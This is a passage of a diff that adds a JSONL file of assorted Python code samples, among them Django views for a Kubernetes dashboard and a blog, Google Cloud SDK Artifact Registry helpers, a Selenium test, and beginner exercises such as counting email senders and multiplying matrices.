diff --git "a/5917.jsonl" "b/5917.jsonl" new file mode 100644--- /dev/null +++ "b/5917.jsonl" @@ -0,0 +1,712 @@ +{"seq_id":"626715510","text":"# -*- coding:utf-8-*-\n\nfrom django.shortcuts import render,redirect,HttpResponse\nfrom container.package.logger import logger\nfrom container.package.etcd_module import etcds\nfrom container.package.kube import kube_func,kube\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required\nfrom Adeployment.core.model_func import save_db\nimport logging\nimport json\n\n\n# Create your views here.\ndef account_login(request):\n if request.method == \"POST\":\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n user = authenticate(username=username,password=password)\n if user:\n login(request,user)\n save_db.save_logs_to_db(\"User:%s Login system\" % request.user)\n return redirect(request.GET.get('next') or '/')\n\n return render(request, 'login.html', locals())\n\ndef account_logout(request,**kwargs):\n request.session.clear()\n logout(request)\n return redirect('/')\n\n@csrf_exempt\n@login_required\ndef change_password_obj(request):\n if request.method == 'GET':\n return redirect(\"/\")\n elif request.method == \"POST\":\n user = request.user\n pwd = request.POST.get('pwd')\n new_pwd = request.POST.get(\"new_pwd\")\n re_pwd = request.POST.get(\"re_pwd\")\n\n obj = authenticate(username=user,password=pwd)\n # obj = models.UserInfo.objects.filter(username=user, password=pwd).first()\n ret = {'status': True, 'error': None}\n\n if obj:\n if new_pwd == re_pwd:\n obj.set_password(new_pwd)\n obj.save()\n return HttpResponse(json.dumps(ret))\n else:\n ret['status'] = False\n ret['error'] = \"新密码不一致\"\n return HttpResponse(json.dumps(ret))\n else:\n ret['status'] = False\n ret['error'] = \"原密码错误\"\n # 登陆失败,页面显示错误信息\n return HttpResponse(json.dumps(ret))\n return redirect('/')\n\n\n@login_required\ndef index(request):\n save_db.save_logs_to_db(\"User:%s Access index.html\" % request.user)\n return render(request,'index.html')\n\n@login_required\ndef nodes(request):\n logger.logger_info(\"GET NODE LIST\",LOG_LEVEL=logging.INFO,log_type='Nodes')\n save_db.save_logs_to_db(\"User:%s Get node list\" % request.user)\n nodes = kube.get_node()\n return render(request,'nodes/nodes/nodes_list.html',locals())\n\n@login_required\ndef node_info(request,node_name,*args):\n save_db.save_logs_to_db(\"User:%s Get node %s info\" %(request.user,node_name))\n node_func = kube.read_node(node_name)\n return render(request,'nodes/nodes/nodes_info.html',locals())\n\n@login_required\n@csrf_exempt\ndef pod(request):\n namespace = request.GET.get('project')\n if namespace:\n if namespace == 'all_data':\n save_db.save_logs_to_db(\"User:%s Get all namespaces\" % request.user)\n pod_list = kube_func.all_pod_for_namespace()\n else:\n save_db.save_logs_to_db(\"User:%s Get namespaces:%s info\" %(request.user,namespace))\n pod_list = kube_func.pod_for_namespace(namespace=namespace)\n return HttpResponse(json.dumps(pod_list))\n else:\n save_db.save_logs_to_db(\"User:%s Get pod list\" % request.user)\n pods_list = kube_func.get_list_namespace()\n namespace_list = [name.metadata.name for name in pods_list.items]\n return render(request,'nodes/pods/pods_list.html',locals())\n\n\n@login_required\ndef etcd_list(request):\n save_db.save_logs_to_db(\"User:%s Get etcd list\" % request.user)\n leader = etcds.cluster_leader()\n 
save_db.save_logs_to_db(\"User:%s Get etcd leader list\" % request.user)\n check_port = etcds.check_etcd_port()\n return render(request,'nodes/clusters/etcd_list.html',locals())\n\n@login_required\n@csrf_exempt\ndef etcd_websocket(request):\n logger.logger_info('GET Etcd Info',LOG_LEVEL=logging.INFO,log_type='ETCD')\n save_db.save_logs_to_db(\"User:%s Use websocket get etcd info\" % request.user)\n if request.method == 'POST':\n leader = etcds.cluster_leader()\n check_port = etcds.check_etcd_port()\n save_db.save_logs_to_db(\"User:%s Use post request of get etcd info success\" % request.user)\n logger.logger_info('GET Success',LOG_LEVEL=logging.INFO,log_type='ETCD')\n return HttpResponse(json.dumps({'leader':leader,'port_status':check_port}))\n else:\n save_db.save_logs_to_db(\"User:%s Get etcd faild,Reason: Use get request\" % request.user)\n logger.logger_error('GET faild',LOG_LEVEL=logging.ERROR,log_type='ETCD')\n return HttpResponse(json.dumps({'error':'Access Error'}))\n\n\n@login_required\ndef pod_namespace(request):\n namespace = request.GET.get('project').split('=')[0]\n pods_list = kube.get_list_namespaced_pod(namespace)\n save_db.save_logs_to_db(\"User:%s Get list namespaced pod success\" % request.user)\n return render(request, 'nodes/pods/pods_list.html', locals())\n\n\n@login_required\ndef pod_info(request,namespace):\n print('pod_info')\n logger.logger_info(\"get pod info\",LOG_LEVEL=logging.INFO,log_type='pod_info')\n name = request.GET.get('pod_name')\n pods_info = kube_func.pod_info(name=name,namespace=namespace)\n save_db.save_logs_to_db(\"User:%s Get pod:%s info on namespaces:%s \" %(request.user,name,namespace))\n return render(request,'nodes/pods/pods_info.html',locals())\n\n@csrf_exempt\n@login_required\ndef namespace(request):\n logger.logger_info('user:%s access namespaces list' % request.user, LOG_LEVEL=logging.INFO, log_type=\"namespace\")\n if request.method == 'POST':\n name = request.GET.get('project')\n if name == 'all_project':\n namespace_info = kube_func.all_namespace_pod_role()\n else:\n namespace_info = kube_func.namespace_pod_role(namespace=name)\n return HttpResponse(json.dumps(namespace_info))\n elif request.method == 'GET':\n return render(request,'nodes/namespace/namespace_list.html',locals())\n\n@login_required\ndef namespace_info(request):\n namespace = request.GET.get('project').split('=')[0]\n ns_info = kube_func.get_namespace_role_binding(namespace=namespace)\n return render(request,'nodes/namespace/namespace_info.html',locals())\n\n@login_required\ndef namespace_role_info(request):\n logger.logger_info(\"user:%s access namespace role info\" %request.user,LOG_LEVEL=logging.INFO,log_type='namespace')\n role = request.GET.get('role').split('=')[0]\n\n\n\n\n@login_required\ndef access_roles(request):\n userList = request.GET.get('roles')\n if userList:\n if userList == 'all_user':\n userFunc = kube_func.get_role_auth()\n else:\n userFunc = kube_func.get_a_role_on_project(userList)\n return HttpResponse(json.dumps(userFunc))\n else:\n userFunc = kube_func.get_all_user_list()\n return render(request,'nodes/roles/roles_list.html',locals())\n\n@login_required\ndef role_info(request):\n role = request.GET.get('role')\n objects = kube_func.get_a_role_on_project(role)\n userInfo = kube_func.get_a_user_info(role)\n return 
@login_required\ndef access_roles(request):\n    userList = request.GET.get('roles')\n    if userList:\n        if userList == 'all_user':\n            userFunc = kube_func.get_role_auth()\n        else:\n            userFunc = kube_func.get_a_role_on_project(userList)\n        return HttpResponse(json.dumps(userFunc))\n    else:\n        userFunc = kube_func.get_all_user_list()\n        return render(request,'nodes/roles/roles_list.html',locals())\n\n@login_required\ndef role_info(request):\n    role = request.GET.get('role')\n    objects = kube_func.get_a_role_on_project(role)\n    userInfo = kube_func.get_a_user_info(role)\n    return render(request,'nodes/roles/roles_info.html',locals())\n\n","sub_path":"container/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"27701214","text":"# -*- coding: utf-8 -*-\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom Login_out.Login import Login\r\nimport unittest,time, os\r\n\r\n\r\nclass Batch_Create_Offer(unittest.TestCase):\r\n\r\n    def setUp(self):\r\n        self.dr = webdriver.Chrome()\r\n        self.dr.get(\"http://aflt-frontend-pre-1017451597.us-west-1.elb.amazonaws.com/login\")\r\n        Login().user_login(self.dr)\r\n        time.sleep(5)\r\n\r\n    def test_create(self):\r\n        dr = self.dr\r\n        # go to the Batch Create Offer page\r\n        ele_0 = dr.find_element_by_css_selector(\"nav > ul > li:nth-child(2)\")\r\n        ActionChains(dr).move_to_element(ele_0).perform()\r\n        dr.find_element_by_css_selector(\" li.open > ul > li:nth-child(6)\").click()\r\n        # click select excel\r\n        dr.find_element_by_id(\"file_upload\").click()\r\n        # launch the upfile.exe AutoIt upload helper\r\n        os.system(\"D:\\\\Autoit\\\\upfile.exe\")\r\n        time.sleep(2)\r\n        dr.find_element_by_css_selector(\"button[type='button']\").click()\r\n\r\n\r\n\r\n    def tearDown(self):\r\n        self.dr.quit()\r\n\r\n\r\nif __name__ == '__main__':\r\n    unittest.main()","sub_path":"Batch_Create_Offer.py","file_name":"Batch_Create_Offer.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"166004093","text":"'''\nhttps://www.hackerrank.com/challenges/larrys-array\n3\n3\n3 1 2\n4\n1 3 4 2\n5\n1 2 3 5 4\n'''\nT = int(raw_input())\nfor _ in range(T):\n    n = int(raw_input())\n    nums = map(int, raw_input().strip().split(' '))\n    sign = 1\n    for x in xrange(0,n):\n        for y in xrange(x+1, n):\n            if(nums[x] > nums[y]):\n                sign *= -1\n    if(sign == 1): print(\"YES\")\n    else: print(\"NO\") ","sub_path":"algorithms/larrysArray/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"432084274","text":"num1 = float(input(\"Please enter a number\"))\nnum2 = float(input(\"Please enter a different number\"))\nbigger = 0.0\nsmaller = 0.0\nif (num1 == num2):\n    print(\"Please enter two different numbers\")\n\nelse:\n    if (num1>num2):\n        bigger = num1\n        smaller = num2\n        print(\"bigger = %.2f\" %bigger, \", smaller = %.2f\" %smaller)\n    else:\n        bigger = num2\n        smaller = num1\n        print(\"bigger = %.2f\" %bigger, \", smaller = %.2f\" %smaller)\n","sub_path":"Week4/A/Week4_Branch06.py","file_name":"Week4_Branch06.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"512264388","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.shortcuts import render, HttpResponse, HttpResponseRedirect, reverse, redirect\r\nfrom django.views.generic import View\r\nfrom django.db.models import Q\r\n\r\nfrom pure_pagination import Paginator, PageNotAnInteger\r\n\r\nfrom models import Article, Tag, Category\r\nfrom forms import ArticleForm\r\n\r\n# Create your views here.\r\n\r\n\r\nclass ArticleListView(View):\r\n    def get(self, request):\r\n\r\n        sort = request.GET.get(\"sort\", \"\")\r\n\r\n        if sort == 'date':\r\n            order_filed = \"-date_published\"\r\n        else:\r\n            order_filed = \"title\"\r\n\r\n        search_keywords = 
request.GET.get(\"keywords\", \"\")\r\n\r\n all_articles = Article.objects.all()\r\n\r\n if search_keywords:\r\n all_articles = all_articles.filter(Q(title__contains=search_keywords)|Q(desc__contains=search_keywords))\r\n\r\n choose_sort = all_articles.order_by(order_filed)\r\n\r\n try:\r\n page = request.GET.get(\"page\", 1)\r\n except PageNotAnInteger:\r\n page = 1\r\n\r\n p = Paginator(choose_sort, 5, request=request)\r\n\r\n article = p.page(page)\r\n\r\n if not request.user.is_authenticated():\r\n username = 'Visitor'\r\n else:\r\n username = request.user.username\r\n\r\n return render(request, \"index.html\", {\r\n \"all_article\": article,\r\n \"sort\": sort,\r\n \"username\": username\r\n })\r\n\r\n\r\nclass ArticleDetailView(View):\r\n def get(self, request, article_id):\r\n article = Article.objects.get(id=int(article_id))\r\n article.click_count += 1\r\n article.save()\r\n\r\n previous_article = Article.objects.raw('SELECT * FROM articles_article WHERE id < %s OR ID=(SELECT MIN(ID) FROM articles_article) ORDER BY id DESC LIMIT 1' % int(article_id))[0]\r\n if previous_article.id == int(article_id):\r\n previous_article = article\r\n\r\n next_article = Article.objects.raw('SELECT * FROM articles_article WHERE id > %s OR ID=(SELECT MAX(ID) FROM articles_article) ORDER BY id ASC LIMIT 1' % int(article_id))[0]\r\n if next_article.id == int(article_id):\r\n next_article = article\r\n\r\n return render(request, 'detail.html', {\r\n 'article': article,\r\n 'previous_article': previous_article,\r\n 'next_article': next_article\r\n })\r\n\r\n\r\nclass ArticleCreateView(View):\r\n def get(self, request):\r\n article_category = Category.objects.all()\r\n article_tag = Tag.objects.all()\r\n return render(request, 'create.html', {\r\n 'article_category': article_category,\r\n 'article_tag': article_tag,\r\n })\r\n\r\n def post(self, request):\r\n obj = ArticleForm(request.POST)\r\n current_user = request.user\r\n print(current_user)\r\n if obj.is_valid():\r\n instance = obj.save(commit=False)\r\n instance.user_id = current_user.id\r\n instance.save()\r\n obj.save_m2m()\r\n\r\n return HttpResponse('{\"status\": \"success\", \"msg\": \"%s\"}' % instance.id, content_type='application/json')\r\n else:\r\n return HttpResponse('{\"status\": \"fail\", \"msg\": \"保存出错\"}', content_type='application/json')\r\n\r\n\r\n\r\n\r\n","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"294855487","text":"\"\"\"\n\"\"\"\nimport os\nfrom astropy.table import Table\n\n\nNERSC_DRN = \"/global/cfs/cdirs/desi/users/gbeltzmo/C3EMC/UNIT\"\n\n\ndef read_diffsky_mock(fn=None, drn=NERSC_DRN):\n \"\"\"Read the diffsky mock from disk.\n\n Parameters\n ----------\n fn : string\n Mock file name\n\n \"\"\"\n if fn is None:\n raise ValueError(\"No filename given\")\n\n f = os.path.join(drn, fn)\n\n return Table.read(f, path=\"data\")\n","sub_path":"c3dev/galmocks/data_loaders/load_diffsky_mock.py","file_name":"load_diffsky_mock.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"20098654","text":"import json\nimport pprint\nfrom collections import defaultdict\nfrom itertools import chain\nimport numpy as np\n\nfrom ThesisData.data_constants import SAVE_NAME\n\nload_file = SAVE_NAME % (\"linear_data\", \"json\")\nsave_file = SAVE_NAME % (\"linear_data_agg\", \"json\")\n\nwith 
open(load_file, \"r\") as f:\n data = json.load(f)\n\ndef flatten_dicts(dicts):\n dicts = map(lambda x: x.items(), dicts)\n result = defaultdict(list)\n \n for k, v in chain(*dicts):\n result[k].append(v)\n \n return result\n\ndef average_flat_dicts(dicts):\n flat = flatten_dicts(dicts)\n result = {}\n \n for k, v in flat.items():\n mean = np.array(v).mean(axis=0)\n\n if (type(mean) == np.ndarray):\n mean = list(mean)\n\n result[k] = mean\n \n return result\n\ndef average_dicts(dicts):\n length = len(dicts)\n dicts = map(lambda x: x.items(), dicts)\n result = defaultdict(int)\n \n for k, v in chain(*dicts):\n result[k] += v\n \n for k in result.keys():\n result[k] /= length\n \n return result\n\nlists = []\norder = []\nfor n_actors in data.keys():\n for n_txs in data[n_actors].keys():\n order.append((n_actors, n_txs))\n lists.append(data[n_actors][n_txs].values())\n\nfirst = next(iter(lists[0]))\ntypes = list(first.keys())\nvalue_names = list(first[types[0]].keys())\n\naggregated_list = []\nfor lst in lists:\n aggregated = defaultdict(lambda: defaultdict(list))\n\n for dct in lst:\n for t in types:\n for name in value_names:\n aggregated[t][name].append(dct[t][name])\n \n aggregated_list.append(aggregated)\n \nfor aggregated in aggregated_list:\n cuts = []\n \n for t in types:\n cuts.append(aggregated[t][\"was_cut\"])\n \n cuts = np.array(cuts).sum(axis=0)==0\n \n for t in types:\n current = aggregated[t]\n current[\"result\"] = average_dicts(\n np.array(current[\"result\"])[cuts])\n current[\"resources\"] = average_flat_dicts(\n np.array(current[\"resources\"])[cuts])\n current[\"was_cut\"] = sum(current[\"was_cut\"]) / len(current[\"was_cut\"])\n \n s_txs = current[\"result\"][\"start_n_txs\"]\n cost = current[\"result\"][\"result_cost\"]\n\n current[\"result\"][\"reduction\"] = (s_txs - cost) / s_txs \n\ni = 0\n\nresult = defaultdict(dict)\nfor n_actors, n_txs in order:\n result[n_actors][n_txs] = aggregated_list[i]\n i += 1\n\nwith open(save_file, \"w\") as f:\n json.dump(result, f, indent=4, sort_keys=True)","sub_path":"ThesisData/transform_data/linear_data_aggregate.py","file_name":"linear_data_aggregate.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"599403751","text":"# -*- coding: utf-8 -*- #\n# Copyright 2019 Google LLC. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utility for interacting with Artifact Registry requests.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport os\nimport re\n\nfrom googlecloudsdk.api_lib import artifacts\nfrom googlecloudsdk.api_lib.artifacts import exceptions as ar_exceptions\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\n\n_INVALID_REPO_NAME_ERROR = (\n \"Names may only contain lowercase letters, numbers, and hyphens, and must \"\n \"begin with a letter and end with a letter or number.\")\n\n_VALID_LOCATIONS = [\n \"northamerica-northeast1\",\n \"us-central1\",\n \"us-east1\",\n \"us-east4\",\n \"us-west1\",\n \"us-west2\",\n \"southamerica-east1\",\n \"europe-north1\",\n \"europe-west1\",\n \"europe-west2\",\n \"europe-west3\",\n \"europe-west4\",\n \"europe-west6\",\n \"asia-east1\",\n \"asia-east2\",\n \"asia-northeast1\",\n \"asia-northeast2\",\n \"asia-south1\",\n \"asia-southeast1\",\n \"australia-southeast1\",\n \"asia\",\n \"europe\",\n \"us\",\n]\n\n_REPO_REGEX = \"^[a-z]([a-z0-9-]*[a-z0-9])?$\"\n\n\ndef _GetMessagesForResource(resource_ref):\n return artifacts.Messages(resource_ref.GetCollectionInfo().api_version)\n\n\ndef _GetClientForResource(resource_ref):\n return artifacts.Client(resource_ref.GetCollectionInfo().api_version)\n\n\ndef _IsValidLocation(location):\n return location.lower() in _VALID_LOCATIONS\n\n\ndef _IsValidRepoName(repo_name):\n return re.match(_REPO_REGEX, repo_name) is not None\n\n\ndef GetProject(args):\n \"\"\"Gets project resource from either argument flag or attribute.\"\"\"\n return args.project or properties.VALUES.core.project.GetOrFail()\n\n\ndef GetRepo(args):\n \"\"\"Gets repository resource from either argument flag or attribute.\"\"\"\n return args.repository or properties.VALUES.artifacts.repository.GetOrFail()\n\n\ndef GetLocation(args):\n \"\"\"Gets location resource from either argument flag or attribute.\"\"\"\n return args.location or properties.VALUES.artifacts.location.GetOrFail()\n\n\ndef GetLocationList():\n \"\"\"Gets a list of all supported locations.\"\"\"\n return _VALID_LOCATIONS\n\n\ndef AppendRepoDataToRequest(repo_ref, repo_args, request):\n \"\"\"Adds repository data to CreateRepositoryRequest.\"\"\"\n if not _IsValidRepoName(repo_ref.repositoriesId):\n raise ar_exceptions.InvalidInputValueError(_INVALID_REPO_NAME_ERROR)\n if not _IsValidLocation(repo_args.location):\n raise ar_exceptions.UnsupportedLocationError(\n \"{} is not a valid location. 
Valid locations are [{}].\".format(\n repo_args.location, \", \".join(_VALID_LOCATIONS)))\n messages = _GetMessagesForResource(repo_ref)\n repo = messages.Repository(\n name=repo_ref.RelativeName(),\n description=repo_args.description,\n format=messages.Repository.FormatValueValuesEnum(\n repo_args.repository_format.upper()))\n request.repository = repo\n request.repositoryId = repo_ref.repositoriesId\n return request\n\n\ndef DeleteVersionTags(ver_ref, ver_args, request):\n \"\"\"Deletes tags associate with the specified version.\"\"\"\n if not ver_args.delete_tags:\n return request\n client = _GetClientForResource(ver_ref)\n messages = _GetMessagesForResource(ver_ref)\n list_tags_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsListRequest(\n parent=ver_ref.Parent().RelativeName())\n list_tags_res = client.projects_locations_repositories_packages_tags.List(\n list_tags_req)\n for tag in list_tags_res.tags:\n if tag.version != ver_ref.RelativeName():\n continue\n delete_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsDeleteRequest(\n name=tag.name)\n err = client.projects_locations_repositories_packages_tags.Delete(\n delete_tag_req)\n if not isinstance(err, messages.Empty):\n raise ar_exceptions.ArtifactRegistryError(\n \"Failed to delete tag {}: {}\".format(tag.name, err))\n return request\n\n\ndef DeletePackageTags(pkg_ref, pkg_args, request):\n \"\"\"Deletes tags associate with the specified package.\"\"\"\n if not pkg_args.delete_tags:\n return request\n client = _GetClientForResource(pkg_ref)\n messages = _GetMessagesForResource(pkg_ref)\n list_tags_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsListRequest(\n parent=pkg_ref.RelativeName())\n list_tags_res = client.projects_locations_repositories_packages_tags.List(\n list_tags_req)\n for tag in list_tags_res.tags:\n delete_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsDeleteRequest(\n name=tag.name)\n err = client.projects_locations_repositories_packages_tags.Delete(\n delete_tag_req)\n if not isinstance(err, messages.Empty):\n raise ar_exceptions.ArtifactRegistryError(\n \"Failed to delete tag {}: {}\".format(tag.name, err))\n return request\n\n\ndef AppendTagDataToRequest(tag_ref, tag_args, request):\n \"\"\"Adds tag data to CreateTagRequest.\"\"\"\n parts = request.parent.split(\"/\")\n pkg_path = \"/\".join(parts[:len(parts) - 2])\n request.parent = pkg_path\n messages = _GetMessagesForResource(tag_ref)\n tag = messages.Tag(\n name=tag_ref.RelativeName(),\n version=pkg_path + \"/versions/\" + tag_args.version)\n request.tag = tag\n request.tagId = tag_ref.tagsId\n return request\n\n\ndef SetTagUpdateMask(tag_ref, tag_args, request):\n \"\"\"Set update mask to UpdateTagRequest.\"\"\"\n messages = _GetMessagesForResource(tag_ref)\n parts = request.name.split(\"/\")\n pkg_path = \"/\".join(parts[:len(parts) - 2])\n tag = messages.Tag(\n name=tag_ref.RelativeName(),\n version=pkg_path + \"/versions/\" + tag_args.version)\n request.tag = tag\n request.updateMask = \"version\"\n return request\n\n\ndef SlashEscapePackageName(pkg_ref, unused_args, request):\n \"\"\"Escapes slashes in package name for ListVersionsRequest.\"\"\"\n request.parent = \"{}/packages/{}\".format(\n pkg_ref.Parent().RelativeName(), pkg_ref.packagesId.replace(\"/\", \"%2F\"))\n return request\n\n\ndef SlashUnescapePackageName(response, unused_args):\n \"\"\"Unescape slashes in package name from ListPackagesResponse.\"\"\"\n ret = []\n for ver in response:\n 
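# keep only the final path segment of each name, then decode %2F escapes back to '/'\n    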
ver.name = os.path.basename(ver.name)\n ver.name = ver.name.replace(\"%2F\", \"/\").replace(\"%2f\", \"/\")\n ret.append(ver)\n return ret\n\n\ndef AppendParentInfoToListReposResponse(response, args):\n \"\"\"Adds log to clarify parent resources for ListRepositoriesRequest.\"\"\"\n if response:\n log.status.Print(\"Listing items under project {}, location {}.\\n\".format(\n GetProject(args), GetLocation(args)))\n return response\n\n\ndef AppendParentInfoToListPackagesResponse(response, args):\n \"\"\"Adds log to clarify parent resources for ListPackagesRequest.\"\"\"\n if response:\n log.status.Print(\n \"Listing items under project {}, location {}, repository {}.\\n\".format(\n GetProject(args), GetLocation(args), GetRepo(args)))\n return response\n\n\ndef AppendParentInfoToListVersionsAndTagsResponse(response, args):\n \"\"\"Adds log to clarify parent resources for ListVersions or ListTags.\"\"\"\n if response:\n log.status.Print(\n \"Listing items under project {}, location {}, repository {}, \"\n \"package {}.\\n\".format(\n GetProject(args), GetLocation(args), GetRepo(args), args.package))\n return response\n","sub_path":"exec -l /bin/zsh/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/command_lib/artifacts/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"493419186","text":"from django.shortcuts import render, get_object_or_404\nfrom parceiro.forms import ParceiroForm\nfrom endereco.forms import EnderecoForm\nfrom parceiro.models import Parceiro\n\ntemplate_novo = 'parceiro/novo.html'\ntemplate_detalhe = 'parceiro/detalhe.html'\n\ndef novo(request):\n dados = {}\n dados['form'] = ParceiroForm()\n dados['formEndereco'] = EnderecoForm()\n return render(request, template_novo, dados)\n\ndef salvar(request, id=None):\n dados = {}\n\n form = ParceiroForm(request.POST or None)\n formEndereco = EnderecoForm(request.POST or None)\n\n if form.is_valid() and formEndereco.is_valid():\n parceiro = form.save(commit=False)\n\n if id not in (None, '0'):\n parceiro.id = id\n\n parceiro.endereco = formEndereco.save()\n\n parceiro.save()\n mensagem = 'Parceiro salvo com sucesso!'\n return detalhe(request, parceiro.id, mensagem)\n\n\ndef detalhe(request, id, mensagem=None):\n\tdados = {}\n\tdados['mensagem'] = mensagem\n\tparceiro = get_object_or_404(Parceiro, id=id)\n\tform = ParceiroForm(instance=parceiro)\n\tdados['form'] = form\n\tdados['formEndereco'] = EnderecoForm(instance=parceiro.endereco)\n\tdados['parceiro'] = parceiro\n\treturn render(request, template_detalhe, dados)","sub_path":"parceiro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"29090531","text":"\"\"\"\r\nA program to demonstrate all concepts covered in the Python fundamentals crash course\r\n\r\nProblem 1 in Chapter 10 of Py4E - https://www.py4e.com/html3/10-tuples\r\n\"Exercise 1: Revise a previous program as follows: Read and parse the “From” lines\r\nand pull out the addresses from the line. Count the number of messages\r\nfrom each person using a dictionary. After all the data has been read,\r\nprint the person with the most commits by creating a list of (count, email)\r\ntuples from the dictionary. 
Then sort the list in reverse order\r\nand print out the person who has the most commits.\"\r\n\r\ncontext: you can use mbox-short.txt as input.\r\n\r\nApproach: This file has lines starting with: \"From\" followed by a space, an email id and so on.\r\nThese are the lines we want and rest of the lines are not needed for this program\r\n\"\"\"\r\n\r\nfrom_counts = {} #an empty dictionary object to store pairs.\r\n\"\"\" a dictionary because I want to store an email id (key) and the number of times \r\nit appeared in the From: field in the text\"\"\"\r\n\r\n# Let us start by reading the file line by line:\r\nfh = open(\"files/mbox-short.txt\") #open a file handler\r\n\r\nfor line in fh: #read the file line by line\r\n    # We have to now see if the line is starting with \"From\"\r\n    if line.startswith(\"From \"): #use the startswith method; envelope lines begin with \"From \" plus the address\r\n        # All lines that start with a From are not necessarily in the format we want.\r\n        try: #what if there is no space at all in this line? the line below will throw an error\r\n            temp = line.split(\" \") #.split() method splits a string into pieces and returns a list.\r\n\r\n            #You can print the variable temp here if you want to see what it looks like.\r\n\r\n            if temp[0] == \"From\" and \"@\" in temp[1]: #conditional and boolean expressions.\r\n                \"\"\"\r\n                At the beginning, I initiated an empty dictionary object to store the email id and the \r\n                number of times it was in the \"From\" field. Here, we start populating that dictionary,\r\n                each time we see a line starting with From and has an @ symbol -which I use as a proxy\r\n                to identify the email. The following line looks for temp[1] i.e., an email id\r\n                in from_counts dictionary. If it finds it, it adds one to the number of times it appeared\r\n                so far in the text. Else, it assigns that email as a new key, and starts the counter at 1. \r\n                \"\"\"\r\n                from_counts[temp[1]] = from_counts.get(temp[1],0)+1\r\n        except:\r\n            print(\"This line starts with a From, but does not have the format we want\")\r\n\r\nfh.close() #close the file handler.\r\n\r\nprint(from_counts) #See what is in the dictionary.\r\n\r\n#convert the dictionary into a list of tuples\r\nfrom_counts_new = []\r\nfor key in from_counts.keys():\r\n    from_counts_new.append((from_counts[key],key))\r\n\r\n\"\"\"the above three lines can be condensed to a single line below. \r\nThis is called \"List comprehension\" in Python. \"\"\"\r\n#from_counts_new = [(v,k) for k,v in from_counts.items()]\r\n\r\n#from_counts_new contains a list of (count, email) tuples.\r\nfrom_counts_new.sort(reverse=True)\r\n\r\n#from_counts_new now contains (count, email) tuples, sorted in descending order of count.\r\n#Remember: .sort() changes the list contents itself, and does not create a new list.\r\n#print(from_counts_new) #See the sorted list\r\n\r\nprint(from_counts_new[0]) #see the one with most sent emails\r\n\r\n\"\"\"\r\nNote: I wrote the code this way to make use of all data structures we discussed and put in conditionals, loops\r\nexception handling, files- everything in place. There are optimal ways of writing the code. You can try yourselves!\r\n\r\nThe only things I did not use here are functions and main function. Try to add those too into this program!\r\n\"\"\"\r\n","sub_path":"code/Everything.py","file_name":"Everything.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"577326008","text":"\"\"\"\nWrite a function that asks for an integer and prints \nthe square of it. 
Use a while loop with a try, except, \nelse block to account for incorrect inputs.\n\n# EXAMPLE OUTPUT\n\nInput an integer: null\nAn error occured! Please try again!\nInput an integer: 2\nThank you, your number squared is: 4\n\"\"\"\n\n#######################\n## SOLUTION BY KEVIN ##\n#######################\n\ndef ask():\n\n\tasking = True\n\n\twhile asking:\n\t\ttry:\n\t\t\tnum = int(input('Input an integer: '))\n\t\texcept:\n\t\t\tprint('An error occured! Please try again!')\n\t\t\tcontinue\n\t\telse:\n\t\t\tprint(f'Thank you, your number squared is: {num**2}')\n\t\t\tasking = False\n\nprint(ask())","sub_path":"ERRORS_AND_EXCEPTIONS_HOMEWORK/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"297941551","text":"\nfrom time import time\n\ndef assign(n,size):\n c = []\n for i in range(size):\n x = []\n for j in range(size):\n x.append(int(n))\n c.append(x)\n return c\n\ndef mul(a,b):\n #c = [[0]*len(a)]*len(a)\n c = assign(0,len(a))\n\n for i in range(len(a)):\n for j in range(len(a)):\n for k in range(len(a)):\n c[i][j] += a[i][k]*b[k][j]\n return c\n\n\na = assign(1,100)\nt1 = time()\nc = mul(a,a)\nt2 = time()\nprint(c)\nprint(\"Time taken is\",t2-t1)\n","sub_path":"matrix 